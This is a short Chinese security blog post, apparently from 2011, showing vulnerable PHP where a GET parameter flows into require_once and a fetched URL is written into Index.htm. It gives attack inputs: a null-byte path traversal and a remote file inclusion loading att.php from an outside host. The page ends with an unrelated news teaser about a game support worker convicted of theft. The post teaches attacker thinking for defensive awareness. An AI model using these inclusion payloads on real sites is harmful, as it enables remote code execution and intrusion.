http://hi.baidu.com/micropoor
|
//2011-11-19 星期六
//程序员的思维
//Micropoor.php代码片段
//略
$modd=$_GET[mod];
… if(!$tpl->isCached(INDEX_TEMPLATE."product_".$modd.".".$tplext,$cacheid)){
require_once './source/module/$modd.php';
//略
}
//我们的思维
index.php?mod=../../1.php%00
//其他条件
php.ini
allow_url_fopen=on
//我们的思维
index.php?mod=http://hi.baidu.com/micropoor//att.php%00
//程序员的思维
//Micropoor.php代码片段
$file=file_get_contents($url);
$newfile=fopen('Index.htm','w');
fwrite($newfile,$file);
fclose($newfile);
?>
//我们的思维
控制$url变量,写入任意代码进index.htm
$url变量假如不可控制
利用第三方网站
|
结论:控制住一切可能控制的变量
文章来源于lcx.cc:Php安全新闻早8点(2011-11-19 星期六)
相关推荐: 为网友私充游戏货币 一游戏客服以盗窃罪获刑事处罚
本报讯 (通讯员 马超 记者 袁玮)90后少女在担任网络游戏客服期间,先后6次为素未谋面的网上朋友的账号里添加虚拟的游戏货币,致公司严重经济损失,而她自己却从未得到任何好处。日前,徐汇区法院以盗窃罪判处其有期徒刑2年,缓期2年执行,并处罚金2000元。…
评论